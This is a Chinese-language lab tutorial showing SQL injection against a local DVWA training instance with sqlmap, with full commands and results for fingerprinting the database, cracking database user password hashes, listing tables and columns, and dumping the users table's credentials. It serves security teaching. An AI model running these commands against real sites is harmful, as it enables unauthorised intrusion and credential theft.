DVWA+SQLmap+Mysql注入實戰

實戰

        實戰1:枚舉登錄MYSQL數據的用戶名與密碼

        實戰2:枚舉所有數據庫

        實戰3:枚舉指定數據庫的數據表

        實戰4:獲取指定數據庫和表中所有列的信息

        實戰5:枚舉指定數據表中的所有用戶名與密碼

 

       環境準備:

       1)登錄http://192.168.1.124/DVWA-1.9,將安全級別設置爲最低;

 

       2)開啓Firefox瀏覽器TamperData插件,等待獲取cookies值;

 

       3)在【SQL Injection】項中,提交User ID爲22(地址欄出現id=22,這就是MySQL的注入點)

             獲得注入點:http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#

 

       4)TamperData彈窗獲取cookies值:security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552

 

        

wKioL1ir7vqCmqKpAACBOlEPstQ897.png

 

wKiom1ir7xaQEBcYAABbjMUXB0w015.png

 

 

實戰1:枚舉登錄MYSQL數據的用戶名與密碼

   sqlmap語法參數:

  • -u :指定目標URL,即注入點

  • --cookies:當前會話的cookies值

  • -b:獲取數據庫類型,檢索數據庫管理系統標識

  • --current-db:獲取當前數據庫

  • --current-user:獲取當前登錄數據庫使用的用戶

 

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' -b  --current-db  --current-user

 

說明:根據提示回覆Y,繼續

 

wKiom1ir73_DP8MFAABNbA9Svfw188.png

 

結果:得到當前數據庫爲dawa,使用的用戶爲root@localhost

 

wKioL1ir75iB4QDPAAA4GIZMCIU558.png

 

 

實戰2:枚舉所有數據庫

   sqlmap語法參數:

  • --users:枚舉數據庫用戶名

  • -password:枚舉數據庫用戶的密碼(hash)

     

   

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" --users --password

wKioL1ir79DQPsHIAAAdqeK4hsY147.png

 

說明:選擇目錄下字典文件,暴力破解

 

wKioL1ir79zz1rl9AAAboWh7XLg480.png

 

結果:數據庫用戶名爲root,密碼也有明文形式123456

 

wKiom1ir7-igiyGKAAAj8h9xVlw598.png

 

 

實戰3:枚舉數據庫和指定數據庫的數據表

   sqlmap語法參數:

  • --dbs:枚舉當前數據庫

 

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" --dbs

 

結果:mysql下所有的數據庫

wKiom1ir8ALiZIK3AAAmjvflPbM786.png

 

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa --tables

 

結果:dvwa庫中,所有的表

wKiom1ir8BXA7lIhAAAjvpwDeGY232.png

 

實戰4:獲取指定數據庫和表中所有列的信息

   sqlmap語法參數:

  • -D:指定的數據庫

  • -T:指定數據庫中的數據表

  • --columns:獲取列的信息

 

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa -T users --columns

 

結果:dvwa庫,users表中所有字段信息

wKiom1ir8CeR8T6bAAA8TyLn2yA812.png

 

 

實戰5:枚舉指定數據表中的所有用戶名與密碼

   sqlmap語法參數:

  • -C:枚舉數據表中的列

  • --dump:存儲數據表項

 

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa -T users -C user,password --dump

 

結果:dvwa庫,users表中user字段和password字段信息,最後表中信息轉存文件中

wKioL1ir8ECQtb0YAABIarDX3dw296.png

原文出處:https://blog.51cto.com/huangzp/1899871

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章